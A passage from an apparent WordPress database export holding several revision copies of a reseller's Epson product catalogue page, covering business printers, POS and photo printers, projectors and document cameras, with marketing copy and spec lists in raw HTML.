Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p>Epson EB-1785WÂ </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p>Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 14:31:59','2018-12-24 06:31:59','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2760,1,'2018-12-24 14:32:48','2018-12-24 06:32:48','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p><strong>Epson WorkForce Enterprise WF-C17590Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce Pro WF-C5290Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-100Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-7711</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p>Epson EB-1785WÂ </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p>Epson EB-536WiÂ </p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p>Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p>Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p>Document Camera ELPDC21Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-24 14:32:48','2018-12-24 06:32:48','',1486,'https://bintara.com.my/blog/2018/12/24/1486-revision-v1/',0,'revision','',0),(2761,1,'2018-12-24 14:33:50','2018-12-24 06:33:50','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p><strong>Epson WorkForce Enterprise WF-C17590Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce Pro WF-C5290Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-100Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>[maxbutton id=\"12\" ]</p><p><strong>Epson WorkForce WF-7711</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink 